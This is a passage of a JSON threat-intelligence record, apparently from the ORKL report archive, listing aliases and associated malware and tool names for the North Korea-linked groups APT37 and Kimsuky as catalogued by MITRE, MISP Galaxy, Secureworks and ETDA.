			"created_at": "2023-01-06T13:46:38.742547Z",
			"updated_at": "2026-04-10T02:00:03.08515Z",
			"deleted_at": null,
			"main_name": "APT37",
			"aliases": [
				"Operation Daybreak",
				"Red Eyes",
				"ScarCruft",
				"G0067",
				"Group123",
				"Reaper Group",
				"Ricochet Chollima",
				"ATK4",
				"APT 37",
				"Operation Erebus",
				"Moldy Pisces",
				"APT-C-28",
				"Group 123",
				"InkySquid",
				"Venus 121"
			],
			"source_name": "MISPGALAXY:APT37",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "191d7f9a-8c3c-442a-9f13-debe259d4cc2",
			"created_at": "2022-10-25T15:50:23.280374Z",
			"updated_at": "2026-04-10T02:00:05.305572Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"Kimsuky",
				"Black Banshee",
				"Velvet Chollima",
				"Emerald Sleet",
				"THALLIUM",
				"APT43",
				"TA427",
				"Springtail"
			],
			"source_name": "MITRE:Kimsuky",
			"tools": [
				"Troll Stealer",
				"schtasks",
				"Amadey",
				"GoBear",
				"Brave Prince",
				"CSPY Downloader",
				"gh0st RAT",
				"AppleSeed",
				"Gomir",
				"NOKKI",
				"QuasarRAT",
				"Gold Dragon",
				"PsExec",
				"KGH_SPY",
				"Mimikatz",
				"BabyShark",
				"TRANSLATEXT"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "760f2827-1718-4eed-8234-4027c1346145",
			"created_at": "2023-01-06T13:46:38.670947Z",
			"updated_at": "2026-04-10T02:00:03.062424Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"G0086",
				"Emerald Sleet",
				"THALLIUM",
				"Springtail",
				"Sparkling Pisces",
				"Thallium",
				"Operation Stolen Pencil",
				"APT43",
				"Velvet Chollima",
				"Black Banshee"
			],
			"source_name": "MISPGALAXY:Kimsuky",
			"tools": [
				"xrat",
				"QUASARRAT",
				"RDP Wrapper",
				"TightVNC",
				"BabyShark",
				"RevClient"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "c8bf82a7-6887-4d46-ad70-4498b67d4c1d",
			"created_at": "2025-08-07T02:03:25.101147Z",
			"updated_at": "2026-04-10T02:00:03.846812Z",
			"deleted_at": null,
			"main_name": "NICKEL KIMBALL",
			"aliases": [
				"APT43 ",
				"ARCHIPELAGO ",
				"Black Banshee ",
				"Crooked Pisces ",
				"Emerald Sleet ",
				"ITG16 ",
				"Kimsuky ",
				"Larva-24005 ",
				"Opal Sleet ",
				"Ruby Sleet ",
				"SharpTongue ",
				"Sparking Pisces ",
				"Springtail ",
				"TA406 ",
				"TA427 ",
				"THALLIUM ",
				"UAT-5394 ",
				"Velvet Chollima "
			],
			"source_name": "Secureworks:NICKEL KIMBALL",
			"tools": [
				"BabyShark",
				"FastFire",
				"FastSpy",
				"FireViewer",
				"Konni"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "71a1e16c-3ba6-4193-be62-be53527817bc",
			"created_at": "2022-10-25T16:07:23.753455Z",
			"updated_at": "2026-04-10T02:00:04.73769Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"APT 43",
				"Black Banshee",
				"Emerald Sleet",
				"G0086",
				"G0094",
				"ITG16",
				"KTA082",
				"Kimsuky",
				"Larva-24005",
				"Larva-25004",
				"Operation Baby Coin",
				"Operation Covert Stalker",
				"Operation DEEP#DRIVE",
				"Operation DEEP#GOSU",
				"Operation Kabar Cobra",
				"Operation Mystery Baby",
				"Operation Red Salt",
				"Operation Smoke Screen",
				"Operation Stealth Power",
				"Operation Stolen Pencil",
				"SharpTongue",
				"Sparkling Pisces",
				"Springtail",
				"TA406",
				"TA427",
				"Thallium",
				"UAT-5394",
				"Velvet Chollima"
			],
			"source_name": "ETDA:Kimsuky",
			"tools": [
				"AngryRebel",
				"AppleSeed",
				"BITTERSWEET",
				"BabyShark",
				"BoBoStealer",
				"CSPY Downloader",
				"Farfli",
				"FlowerPower",
				"Gh0st RAT",
				"Ghost RAT",
				"Gold Dragon",
				"GoldDragon",
				"GoldStamp",
				"JamBog",
				"KGH Spyware Suite",
				"KGH_SPY",
				"KPortScan",
				"KimJongRAT",
				"Kimsuky",
				"LATEOP",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Lovexxx",
				"MailPassView",
				"Mechanical",
				"Mimikatz",
				"MoonPeak",
				"Moudour",
				"MyDogs",
				"Mydoor",
				"Network Password Recovery",
				"PCRat",
				"ProcDump",
				"PsExec",
				"ReconShark",
				"Remote Desktop PassView",
				"SHARPEXT",
				"SWEETDROP",
				"SmallTiger",
				"SniffPass",
				"TODDLERSHARK",
				"TRANSLATEXT",
				"Troll Stealer",
				"TrollAgent",
				"VENOMBITE",
				"WebBrowserPassView",
				"xRAT"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434707,
	"ts_updated_at": 1775792260,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d0a0a5f2b671b004318874f8d2683e3ce5bd42f3.pdf",
		"text": "https://archive.orkl.eu/d0a0a5f2b671b004318874f8d2683e3ce5bd42f3.txt",
		"img": "https://archive.orkl.eu/d0a0a5f2b671b004318874f8d2683e3ce5bd42f3.jpg"
	}
}